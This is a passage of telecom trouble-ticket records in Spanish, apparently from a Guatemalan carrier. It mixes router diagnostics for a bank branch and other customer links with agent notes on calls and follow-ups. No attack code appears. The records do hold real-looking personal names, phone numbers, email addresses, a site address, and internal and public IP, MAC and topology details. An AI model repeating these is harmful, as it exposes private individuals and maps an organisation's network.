JUN 16 23:36:05.367 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.212.200.151 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 16 23:40:36.043 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.212.200.151 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 17 12:30:53.420 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.151 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 17 12:31:06.164 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.151 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 21 09:49:52.313 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.212.200.151 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 21 09:54:09.041 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.212.200.151 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 21 23:00:31.269 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.151 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 21 23:00:34.149 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.151 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 22 04:25:29.480 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.212.200.151 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 22 04:25:30.044 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.157 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 22 04:25:39.156 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.151 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 22 04:25:40.560 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.156 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 22 06:19:40.504 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.212.200.151 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 22 06:19:43.832 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.156 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 22 06:19:54.836 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.151 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 22 06:20:22.940 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.157 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 22 06:41:12.207 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.156 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 22 06:41:15.143 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.151 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 22 06:41:22.679 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.157 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 22 06:41:35.423 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.212.200.151 ON GIGABITETHERNET0/1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 22 06:44:52.935 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.212.200.151 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 22 06:44:53.215 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.157 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 22 06:45:04.755 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.156 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 22 06:45:13.531 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.90.151 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
CC_BANRURAL_GT_AGENCIA_0892#
SHOW CLOCK
06:50:16.071 UTC WED JUN 22 2022
CC_BANRURAL_GT_AGENCIA_0892#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.90.129            5   084F.0AC8.669F  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.90.149            -   5057.A8C1.D0E1  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.90.151           30   3458.40C8.95C7  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.90.153           30   C0FF.A821.E0E9  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.90.156           30   3458.40C8.3F9C  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.123.28            -   5057.A8C1.D0E0  ARPA   GIGABITETHERNET0/0.2249
INTERNET  10.138.92.17            -   5057.A8C1.D0E3  ARPA   VLAN1
INTERNET  10.138.92.22            0   F08E.DB17.A88E  ARPA   VLAN1
INTERNET  10.168.92.126           -   5057.A8C1.D0E3  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0892#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN REDUNDANTE/_/8902030T/_/
GI0/0.2249                     UP             UP       WAN REDUNDANTE/_/8902030T/_/
GI0/1                          UP             UP       WAN PRINCIPAL/_/8901814T/_/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892#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/0.2249    10.72.123.28    YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.72.90.149    YES NVRAM  UP                    UP
FASTETHERNET0/0/0          UNASSIGNED      YES UNSET  UP                    UP
FASTETHERNET0/0/1          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/2          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/3          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.212.122.17   YES NVRAM  UP                    UP
VLAN1                      10.168.92.126   YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0892#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.72.90.149
  PING 10.72.90.149: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.90.149 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.73
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.72.90.149
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.90.149/32  DIRECT  0    0                 0.0.0.0         VLANIF184			</t>
  </si>
  <si>
    <t>F4611675</t>
  </si>
  <si>
    <t>SE REVISA SERVICIO SE ENCUENTRA OPERATIVO NO SE TIENE GESTION DEL CPE SE PROCEDE CON EL CIERRE POR PROBLEAS DE ENERGIA COMERCIAL DEL CLIENTE</t>
  </si>
  <si>
    <t>F4611859</t>
  </si>
  <si>
    <t>SERVICIO CAÍDO, SE ENVIO CORREO A CLIENTE, SOLICITANDO DATOS DE PERSONAL DE PR PARA REALIZAR PRUEBAS.
JURGEN RENE BOCH CAAL
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO LE INFORMAMOS QUE ESTAMOS ATENTOS A SUS COMENTARIOS CON RESPECTO A LOS DATOS DE PERSONAL DE SUCURSAL PARA PODER REALIZAR PRUEBAS DE PRIMER NIVEL.
SALUDOS.
.</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 66209720 EXT 113021 PARA SEGUIMIENTO, NO CONTESTA; SE LE PIDE APOYO VÍA CORREO, SIGUIENDO EL HILO:
ASUNTO: RE: ENLACE DOWN - ENLACE PRINCIPAL EL BOTELLON CLARO ID 86100098T (172.30.0.29)</t>
  </si>
  <si>
    <t>SE HABLA DE NUEVO CON CARLOS, PERO INDICA QUE YA NO ESTA EN LA OFICINA, SOLICITA QUE SE LLAME A ALGUIEN DE SISTEMAS DE ZONA 2 (LUIS CHEN O WILSON LUNA REPORTARON  SERVICIO EN CORREO PERO NO HAY SD ASOCIADA)
ID
1001922544
COLA:
NOMBRE: A: 54608940
NÚMERO: 54608940
DURACIÓN: 0:02:20
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 54608940
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 23/06/2022 15:05:23</t>
  </si>
  <si>
    <t>SE HABLA CON CARLOS TEL. 66209720 EXT 113021 DE SISTEMAS ZONA 2 , SE LE INFORMA QUE CONTACTO BRINDADO EN CORREO POR LUIS CHEN || CARLOS ROSALES CEL: 54608940 || NO ESTA EN OFICINA Y BRYAN 54496147 INDICA QUE NO TIENE ACCESO A LOS EQUIPOS, POR LO QUE COMENTA QUE ESTARAN COORDINANDO PERSONAL INTERNO PARA IR A REVISAR PERO SERIA HASTA EL DIA DE MAÑANA. TT PERMANECE EN ETAPA PENDIENTE CLIENTE. SEGUIMIENTO EL DIA DE MAÑANA.
ID
1001923775
COLA:
NOMBRE: A: 66209720
NÚMERO: 66209720
DURACIÓN: 0:01:32
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 66209720
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 23/06/2022 15:08:45</t>
  </si>
  <si>
    <t>SE REENVIO CORREO A LUIS CHEN, AUN NO RESPONDE
DE: WILLIAM GABRIEL SANAVRIA &lt;WILLIAM.SANAVRIA@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 10:44
PARA: LUISCHEN@ICASA.COM.GT &lt;LUISCHEN@ICASA.COM.GT&gt;
ASUNTO: RV: ENLACE ALARMADO CC_CERVECERIA_GT_EL_BOTELLON
LUIS BUEN DÍA,
NOS PODRÍAS APOYAR CON LA SIGUIENTE SOLICITUD. SE HABLÓ CON CARLOS ROSALES PERO NO SE ENCONTRABA EN SITIO, DIO EL NÚMERO DE CONTACTO DE BRYAN ARANJO PERO NO QUISO APOYAR INDICANDO QUE NO TIENE ACCESO AL SITIO DONDE ESTAN LOS EQUIPOS, QUE SE CONTACTE A ALGUIEN DE SISTEMAS, SIN EMBARGO NO CONTAMOS CON DICHO CONTACTO.
QUEDO A LA ESPERA DE TUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4611862</t>
  </si>
  <si>
    <t>CLIENTE MILDA GARCIA 52549688 VALIDA QUE EN ESTE E1 YA GENERA Y RECIBE LLAMADAS, CONFIRMA QUE SE REALIZÓ EL ROLLBACK Y SERVICIO YA ESTA OPERATIVO. AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE MILDA GARCIA 52549688 INDICA QUE EL DÍA DE AYER SE MIGRÓ SU SERVICIO A SIP Y SE HIZO CAMBIO DE PLANTA PBX, INDICA QUE TUVIERON ATRASOS POR PROBLEMAS CON SU PBX Y EL DIA DE HOY INDICA QUE NO LOGRAN SACAR NI RECIBIR LLAMADAS. CLIENTE INTENTA ENLAZAR A SU PROVEEDOR DE LA PBX PERO NO CONTESTA, CLIENTE INDICA QUE DEVOLVERÁ LA LLAMADA PARA HACER PRUEBAS.
ID DE LLAMADA: 1001564029</t>
  </si>
  <si>
    <t>F4611882</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE PEDRO HERNANDEZ 79513885 PARA REALIZAR PRUEBAS PERO NO NOS CONTESTA DESPUES DE DOS INTENTOS, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE ROBERTO INDICA QUE HASTA EL MOMENTO NO HAY INCONVENIENTES.
SOLICITA REALIZAR OTRA PRUEBA EL DIA DE MAÑANA A PARTIR DE LAS 14:00HRS PERO QUE SOLO DURE 20MIN.
LA PRUEBA EL DIA DE HOY DURO CASI LAS DOS HORAS Y EL INCONVENIENTE NO SE PRESENTO.</t>
  </si>
  <si>
    <t>SE TIENE EN CONFERENCIA AL CLIENTE PEDRO HERNANDEZ, QUIEN VA A COLOCAR LAS LLAMADAS SALIENTES EN AUTOMATICO, AL MISMO TIEMPO FRANCIS DE CX TIENE PUESTA UNA TRAZA.
3001171873
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4895
DURACIÓN: 0:00:04
ESTADO: CONECTADA
DETALLES: 4895
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/06/2022 14:07:13</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE PEDRO HERNANDEZ PERO NO CONTESTA.
1001938154, 1001938656.
COLA:
NOMBRE: A: 0050379513885
NÚMERO: 0050379513885
DURACIÓN: 0:00:28
ESTADO: MARCANDO
DETALLES: 0050379513885
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 23/06/2022 15:56:01</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE PEDRO HERNANDEZ PARA SABER CUANDO PUEDE REALIZAR LAS PRUEBAS, PERO NO CONTESTA.
ID 2001122867, 2001123107.
SE LLAMARA ENSEGUIDA.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE PEDRO HERNANDEZ PERO NO CONTESTA.
2001145687, 2001145801
COLA:
NOMBRE: A: 0050379513885
NÚMERO: 0050379513885
DURACIÓN: 0:00:20
ESTADO: MARCANDO
DETALLES: 0050379513885
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 24/06/2022 15:35:12</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE PEDRO HERNANDEZ PERO N CONTESTA.1001729737, 1001729931</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN SE HABLO CON EL CLIENTE PEDRO QUIEN INDICA QUE SU SERVICIO PRIMERO ESTABA CONFIGURADO COMO E1.
DESPUES SE TRASLADARON A SIP PERO EL SERVICIO ERA INESTABLE Y CON EL TRAFICO DE LLAMADAS SE CAIA.
POSTERIORMENTE EL CLIENTE SOLICITO NUEVAMENTE REGRESARLO A E1.
1001730008
COLA:
NOMBRE: A: 0050325207100
NÚMERO: 0050325207100
DURACIÓN: 0:00:01
ESTADO: MARCANDO
DETALLES: 0050325207100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 22/06/2022 16:37:50</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE PEDRO HERNANDEZ.PERO NO CONTESTA.
1001927987, 1001928229
COLA:
NOMBRE: A: 0050379513885
NÚMERO: 0050379513885
DURACIÓN: 0:00:06
ESTADO: MARCANDO
DETALLES: 0050379513885
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 23/06/2022 15:21:21</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE PEDRO HERNANDEZ PARA REALIZAR PRUEBAS PERO NO CONTESTA.
2001617241, 2001617329.
COLA:
NOMBRE: A: 0050379513885
NÚMERO: 0050379513885
DURACIÓN: 0:00:23
ESTADO: MARCANDO
DETALLES: 0050379513885
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 27/06/2022 18:20:59</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE PEDRO HERNANDEZ QUIEN SOLICITA UNA VISITA TECNICA. PARA EL DIA DE MAÑANA A LAS 9:00AM QUE ES CUANDO COMIENZA EL TRAFICO ALTO YA QUE INDICA QUE ESTO DEL CRUCE DE LLAMADAS COMENZO DESPUES DE LA MIGRACION DE SIP A E1.
1001939231
COLA:
NOMBRE: A: 0050325207100
NÚMERO: 0050325207100
DURACIÓN: 0:06:26
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050325207100
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 23/06/2022 16:06:16</t>
  </si>
  <si>
    <t>F4611885</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PEDRO HENRIQUEZ AL 61801782 SE SOLICITAN DATOS PARA LA VISITA **
HORARIO DE ATENCION: 7:00 AM A 17:30 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADO
DIRECCCION: LOTIFICACION LAS AMERICAS LOTE 9B NEJAPA
ATENDERA EN SITIO:  PEDRO HENRIQUEZ
-ID 1001584275
**</t>
  </si>
  <si>
    <t>F4611891</t>
  </si>
  <si>
    <t>SE LLAMA SR.  JOSE BONILLA 72691932 NO CONTESTO IVR ENVIA A BUZON, ID: 1001756702.
SE VALIDA ENLACE OPERATIVO Y ESTABLE, CON CONEXION HACIA INTERNET:
&lt;ID1148060&gt;PING -A 192.168.1.1 8.8.8.8
  PING 8.8.8.8: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=1 TTL=115 TIME=43 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=2 TTL=115 TIME=43 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=3 TTL=115 TIME=43 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=4 TTL=115 TIME=43 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=5 TTL=115 TIME=43 MS
  --- 8.8.8.8 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 43/43/43 MS
&lt;ID1148060&gt;
&lt;ID1148060&gt;
&lt;ID1148060&gt;
&lt;ID1148060&gt;SCREEN-LENGTH 0 TEMPORARY
INFO: THE CONFIGURATION TAKES EFFECT ON THE CURRENT USER TERMINAL INTERFACE ONLY.
&lt;ID1148060&gt;DISP IP INT BRIEF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49.89.161/30     UP         UP
GIGABITETHERNET0/0/5              UNASSIGNED           UP         DOWN
LOOPBACK5                         10.166.22.229/32     UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           201.247.177.86/30    UP         UP
&lt;ID1148060&gt;DISP DEVICE SLOT 0
AR129CGVW-L'S DEVICE STATUS:
SLOT  SUB TYPE             ONLINE   POWER     REGISTER      ALARM        PRIMARY
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
0     -   AR129CGVW-L      PRESENT  POWERON   REGISTERED    NORMAL       MASTER
-------------------------------------------------------------------------------
  BOARD NAME        : AR129CGVW-L
  BOARD DESCRIPTION : AR129CGVW-L
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
  PORT  PORT         OPTIC    MDI   SPEED  DUPLEX  FLOW-    PORT     POE
        TYPE         STATUS         (MBPS)         CTRL     STATE    STATE
-------------------------------------------------------------------------------
  0     GE(C)        -        AUTO  1000   FULL    DISABLE  DOWN     -
  1     GE(C)        -        AUTO  100    FULL    DISABLE  UP       -
  2     GE(C)        -        AUTO  1000   FULL    DISABLE  DOWN     -
  3     GE(C)        -        AUTO  1000   FULL    DISABLE  DOWN     -
  4     GE(C)        -        AUTO  1000   FULL    DISABLE  UP       -
  5     GE(C)        -        AUTO  1000   FULL    DISABLE  UP       -
  6     VDSL(-)      -        -     5.696  -       -        DOWN     -
  7     CELLULAR(-)  -        -     10     -       -        -        -
  8     WLAN(-)      -        -     54     -       -        UP       -
  9     WLAN(-)      -        -     54     -       -        UP       -
-------------------------------------------------------------------------------
&lt;ID1148060&gt; DISP INT DES
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
(V): VIRTUALPORT
INTERFACE                     PHY     PROTOCOL DESCRIPTION
CELL0/0/0                     DOWN    DOWN     HUAWEI, AR SERIES, CELLULAR0/0/0
                                               INTERFACE
ETH0/0/0                      DOWN    DOWN     HUAWEI, AR SERIES, ETHERNET0/0/0
                                               INTERFACE
GE0/0/0                       DOWN    DOWN     HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/0 INTERFACE
GE0/0/1                       UP      UP       HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/1 INTERFACE
GE0/0/2                       DOWN    DOWN     HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/2 INTERFACE
GE0/0/3                       DOWN    DOWN     HUAWEI, AR SERIES, GIGABITETHERNE
                                               T0/0/3 INTERFACE
GE0/0/4                       UP      UP       WAN PRINCIPAL /_/ID1148060SV/_/
GE0/0/5(V)                    UP      DOWN     VIRTUALPORT
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC
                                               E
VLANIF1                       UP      UP       RED LAN CLIENTE
WLAN-BSS0                     UP      UP       HUAWEI, AR SERIES, WLAN-BSS0 INTE
                                               RFACE
WLAN-BSS7                     UP      UP       HUAWEI, AR SERIES, WLAN-BSS7 INTE
                                               RFACE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               1 INTERFACE
&lt;ID1148060&gt;DISP ARP ALL
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                    VLAN/CEVLAN(SIP/DIP)      PVC
------------------------------------------------------------------------------
10.149.89.161   5CE8-83E4-6703            I -         GE0/0/4
10.149.89.162   183D-5E15-B7B0  14        D-0         GE0/0/4
201.247.177.86  5CE8-83E4-6702            I -         VLANIF1
192.168.1.1     5CE8-83E4-6702            I -         VLANIF1
192.168.1.202   7EC2-53C4-58B1  19        D-0         GE0/0/1
                                             1/-
192.168.1.160   3CA0-67A3-1E95  5         D-0         GE0/0/1
                                             1/-
192.168.1.180   EA56-6130-8A1C  15        D-0         GE0/0/1
                                             1/-
192.168.1.194   AEDE-0A9F-C62D  20        D-0         GE0/0/1
                                             1/-
201.247.177.84  INCOMPLETE      1         D-0         VLANIF1
                                             1/-
201.247.177.85  INCOMPLETE      1         D-0         VLANIF1
                                             1/-
------------------------------------------------------------------------------
TOTAL:10        DYNAMIC:7       STATIC:0     INTERFACE:3
&lt;ID1148060&gt;DISP MAC-AD
-------------------------------------------------------------------------------
MAC ADDRESS       VLAN/BRIDGE/VSI/BD      LEARNED-FROM               TYPE
-------------------------------------------------------------------------------
386B-1CCA-4CA3       1/-/-                GE0/0/1                    DYNAMIC
3CA0-67A3-1E95       1/-/-                GE0/0/1                    DYNAMIC
40A5-EF3F-FEA4       1/-/-                GE0/0/1                    DYNAMIC
7EC2-53C4-58B1       1/-/-                GE0/0/1                    DYNAMIC
AEDE-0A9F-C62D       1/-/-                GE0/0/1                    DYNAMIC
D89E-F32C-1334       1/-/-                GE0/0/1                    DYNAMIC
EA56-6130-8A1C       1/-/-                GE0/0/1                    DYNAMIC
-------------------------------------------------------------------------------
TOTAL ITEMS DISPLAYED = 7
&lt;ID1148060&gt;DISP VER
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR120 V200R009C00SPC500)
COPYRIGHT (C) 2011-2018 HUAWEI TECH CO., LTD
HUAWEI AR129CGVW-L ROUTER UPTIME IS 0 WEEK, 0 DAY, 9 HOURS, 22 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 0 DAY, 9 HOURS, 21 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR129CGVW-L
4. BOOTROM  VERSION  : 1
&lt;ID1148060&gt;DISP LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 59
MAY 18 2022 20:03:46+00:00 ID1148060 %%01NTP/4/PACKET_LENGTH_WRONG(L)[0]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAY 18 2022 19:57:11+00:00 ID1148060 %%01NTP/4/PACKET_LENGTH_WRONG(L)[1]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAY 18 2022 18:09:54+00:00 ID1148060 %%01NTP/4/PACKET_LENGTH_WRONG(L)[2]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAY 18 2022 17:52:23+00:00 ID1148060 %%01NTP/4/PACKET_LENGTH_WRONG(L)[3]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAY 18 2022 17:12:54+00:00 ID1148060 %%01NTP/4/PACKET_LENGTH_WRONG(L)[4]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAY 18 2022 17:12:54+00:00 ID1148060 %%01INFO/4/SUPPRESS_LOG(L)[5]:LAST MESSAGE REPEATED 10 TIMES.(INFOID=4284694529, MODULENAME=CM, INFOALIAS=USER_ACCESSRESULT)
MAY 18 2022 17:00:34+00:00 ID1148060 %%01INFO/4/SUPPRESS_LOG(L)[6]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=4284694529, MODULENAME=CM, INFOALIAS=USER_ACCESSRESULT)
MAY 18 2022 16:56:32+00:00 ID1148060 %%01INFO/4/SUPPRESS_LOG(L)[7]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=4284694529, MODULENAME=CM, INFOALIAS=USER_ACCESSRESULT)
MAY 18 2022 15:50:18+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[8]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE UP STATE.
MAY 18 2022 15:50:18+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[9]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO UP STATE.
MAY 18 2022 15:50:12+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[10]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE DOWN STATE.
MAY 18 2022 15:50:12+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[11]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO DOWN STATE.
MAY 18 2022 15:49:21+00:00 ID1148060 %%01IFNET/4/LINK_STATE(L)[12]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE UP STATE.
MAY 18 2022 15:49:21+00:00 ID1148060 %%01IFPDT/4/IF_STATE(L)[13]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO UP STATE.
MAY 18 2022 15:49:17+00:00 ID1148060 %%01RM/4/IPV4_DEFT_RT_CHG(L)[14]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=DELETE, INSTANCEID=0, PROTOCOL=STATIC, EXITIF=UNKNOWN, NEXTHOP=10.149.89.162, NEIGHBOUR=0.0.0.0, PREFERENCE=60, LABEL=NULL, METRIC=0)
